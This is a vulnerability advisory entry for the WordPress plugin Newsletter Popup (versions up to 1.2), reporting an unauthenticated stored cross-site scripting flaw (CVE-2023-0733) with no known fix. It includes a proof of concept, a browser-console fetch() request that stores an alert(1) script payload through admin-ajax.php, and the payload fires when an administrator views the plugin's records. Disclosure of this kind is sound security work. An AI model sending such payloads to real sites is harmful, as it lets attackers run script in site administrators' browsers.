WordPress Plugin Vulnerabilities

Newsletter Popup <= 1.2 - Unauthenticated Stored XSS

Description

The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks

Proof of Concept

1. Create a Newsletter popup (any will do) and publish it.

2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); 

3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.

4. The alert will trigger successfully.

Affects Plugins

Plugin icon
newsletter-popup
No known fix

References

CVE
CVE-2023-0733

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
fed1e184-ff56-44fe-9876-d17c0156447a

Timeline

Publicly Published
2023-05-02 (about 7 months ago)
Added
2023-05-02 (about 6 months ago)
Last Updated
2023-05-02 (about 6 months ago)

Other

Published
Title
Published
2022-06-14
Title
XO Slider < 3.3.3 - Contributor+ Stored Cross-Site Scripting
Published
2021-09-20
Title
Wechat Reward <= 1.7 - CSRF to Stored Cross-Site Scripting
Published
2015-02-11
Title
Mobile Domain <= 1.5.2 - CSRF/XSS
Published
2021-11-03
Title
Email Tracker < 5.2.6 - Reflected Cross-Site Scripting
Published
2018-02-14
Title
Ultimate Member <= 2.0 - Multiple XSS